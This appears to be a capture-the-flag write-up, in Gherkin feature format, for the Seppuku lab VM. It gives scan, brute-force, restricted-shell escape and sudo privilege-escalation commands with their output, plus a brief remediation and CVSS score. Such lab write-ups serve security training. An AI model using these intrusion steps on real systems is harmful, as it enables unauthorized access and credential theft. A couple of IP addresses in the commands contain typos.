## Version 1.4.1
## language: en

Feature:
  TOE:
    Seppuku
  Category:
    Information Disclosure
  Location:
    http://192.168.1.70:7601/
  CWE:
    CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
  Rule:
    REQ.360: Remove unnecessary sensitive information
  Goal:
    Get shell as root
  Recommendation:
    Avoid disclosing sensitive system information

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Parrot OS         |  4.10      |
    | Nmap              |  7.80      |
    | Hydra             |  9.0       |
    | VMWare            |  16.0      |
    | SSH               |  1.10      |
    | Dirb              |  2.22      |
    | Python            |  2.7       |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on Vmware
    And I realize that a user is required to log in to the system
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.1.0/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 12:59 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.0091s latency).
    Nmap scan report for 192.168.1.53
    Host is up (0.22s latency).
    Nmap scan report for 192.168.1.70
    Host is up (0.0064s latency).
    Nmap scan report for 192.168.1.73
    Host is up (0.0056s latency).
    Nmap scan report for 192.168.1.254
    Host is up (0.030s latency).
    Nmap done: 256 IP addresses (5 hosts up) scanned in 14.07 seconds
    """
    Then I determined that the IP of the machine is 192.168.1.70
    And I scanned the IP and found it has 8 open ports
    """
    $ nmap -sS -sV -p- 192.178.1.70
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 10:37 -05
    Nmap scan report for 192.168.1.70
    Host is up (0.0013s latency).
    Not shown: 65527 closed ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp         vsftpd 3.0.3
    22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    80/tcp   open  http        nginx 1.14.2
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    7080/tcp open  ssl/http    LiteSpeed httpd
    7601/tcp open  http        Apache httpd 2.4.38 ((Debian))
    8088/tcp open  http        LiteSpeed httpd
    MAC Address: 00:0C:29:3D:0F:C1 (VMware)
    Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux

    Service detection performed. Please report any incorrect results
    Nmap done: 1 IP address (1 host up) scanned in 25.74 seconds
    """

  Scenario: Normal use case
    Given I access the site
    Then an username and password is requested [evidences](normal.png)
    And if it is not correct an error message is displayed
    """
    401 Authorization Required
    """

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I need to login to access the site
    Then my idea was find directories on the server with "dirb"
    And I focused mainly on Apache service
    """
    $ dirb http://192.168.1.70:7601/
    """
    Then dirb found some interesting directories [evidences](dirb.png)
    """
    ---- Scanning URL: http://192.168.1.70:7601/ ----
    ==> DIRECTORY: http://192.168.1.70:7601/a/
    ==> DIRECTORY: http://192.168.1.70:7601/b/
    ==> DIRECTORY: http://192.168.1.70:7601/c/
    ==> DIRECTORY: http://192.168.1.70:7601/ckeditor/
    ==> DIRECTORY: http://192.168.1.70:7601/d/
    ==> DIRECTORY: http://192.168.1.70:7601/database/
    ==> DIRECTORY: http://192.168.1.70:7601/e/
    ==> DIRECTORY: http://192.168.1.70:7601/f/
    ==> DIRECTORY: http://192.168.1.70:7601/h/
    + http://192.168.1.70:7601/index.html (CODE:200|SIZE:171)
    ==> DIRECTORY: http://192.168.1.70:7601/keys/
    ==> DIRECTORY: http://192.168.1.70:7601/production/
    ==> DIRECTORY: http://192.168.1.70:7601/q/
    ==> DIRECTORY: http://192.168.1.70:7601/r/
    ==> DIRECTORY: http://192.168.1.70:7601/secret/
    """
    And two directories caught my attention (keys and secret)
    When I inspected these directories I found sensitive information
    Then this information is
    """
    hostname           : http://192.168.1.70:7601/secret/hostname
    password list      : http://192.168.1.70:7601/secret/password.lst
    /etc/passwd backup : http://192.168.1.70:7601/secret/passwd.bak
    /etc/shadow backup : http://192.168.1.70:7601/secret/shadow.bak
    private RSA key    : http://192.168.1.70:7601/keys/private
    """
    And with this information, many possibilities of attack are opened
    """
    1. Use the hostname and password list to bruteforce the FTP service
    2. Use the hostname and password list to bruteforce the SSH service
    3. Use the private key to login via SSH
    4. List users with backup files and try default credentials
    5. Etc
    """

  Scenario: Exploitation
    Given my idea was to brute force against the SSH service
    Then I used Hydra with the wordlist "password.lst"
    And the user given by the hostname file: "seppuku"
    """
    $ hydra -L hostname -P password.lst 192.168.1.70 ssh
    """
    And I successfully got the SSH service password [evidences](sshbf.png)
    Then I was able to connect to the service [evidences](connectssh.png)
    """
    $ ssh seppuku@192.168.1.70
    seppuku@192.168.1.70's password:
    Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Wed Oct 14 11:45:11 2020 from 192.168.1.73
    seppuku@seppuku:~$
    """
    And now that I have a shell the idea is to get root privileges
    Then for this I need a way to do an Local Privilege Escalation (LPE)
    And the first thing I do is list the current directory [evidences](ls.png)
    """
    seppuku@seppuku:~$ ls -la
    total 28
    drwxr-xr-x 3 seppuku seppuku 4096 Oct 14 11:30 .
    drwxr-xr-x 5 root    root    4096 May 13 04:50 ..
    -rw-r--r-- 1 seppuku seppuku  220 May 13 00:28 .bash_logout
    -rw-r--r-- 1 seppuku seppuku 3526 May 13 00:28 .bashrc
    drwx------ 3 seppuku seppuku 4096 May 13 10:05 .gnupg
    -rw-r--r-- 1 root    root      20 May 13 04:47 .passwd
    -rw-r--r-- 1 seppuku seppuku  807 May 13 00:28 .profile
    """
    Then I found a file interesting: ".passwd"
    And when reading it I got, by the file name, a password in raw text
    """
    seppuku@seppuku:~$ cat .passwd
    12345685213456!@!@A
    seppuku@seppuku:~$ cd
    -rbash: cd: restricted
    seppuku@seppuku:~$ ls
    """
    Then I realize that the server uses "rbash", a restricted shell
    And to bypass this I used Python [evidences](bypassrestricted.png)
    """
    $ python -c "import os; os.system('/bin/bash')"
    """
    Then I listed the home directory users [evidences](users.png)
    And the users are:
    """
    seppuku
    samurai
    tanto
    """
    Then I used the password obtained from the "seppuku" homepath
    And I logged in as samurai [evidences](susamurai.png)
    Then I used the command "sudo -l" to list user's privileges
    """
    $ sudo -l
    Matching Defaults entries for samurai on seppuku:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin

    User samurai may run the following commands on seppuku:
        (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
    """
    And I realize that it is possible to run a binary as root
    """
    /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
    """
    Then this binary is part of the user "tanto"
    And when listing the homepath of this user
    Then this binary is not found [evidences](cgibin.png)
    And this indicates that I must find a way to log in as "tanto"
    Then looking into the revealed files there is a private RSA key
    And I use it to log in as "tanto" [evidences](connecttanto.png)
    """
    $ ssh -i private tanto@192.68.1.70
    """
    Then once logged in I create the ".cgi_bin" directory
    And the "bin" binary with the contents of "/bin/bash" [evidences](bin.png)
    Then I just executed the command
    """
    sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
    """
    And this way I could get root privileges [evidences](root.png)

  Scenario: Remediation
    Given this lies in revealing sensitive content
    Then one way to remedy this is to avoid sharing sensitive information

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      9.6/10 (High) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.5/10 (High) - E:P/RL:W/RC:R
    Environmental:Unique and relevant attributes to a specific user environment
      8.5/10 (High) - CR:L/IR:M/AR:M/MAV:A/MAC:L/MPR:N/MUI:N

  Scenario: Correlations
    No correlations have been found to this date {2020-10-14}
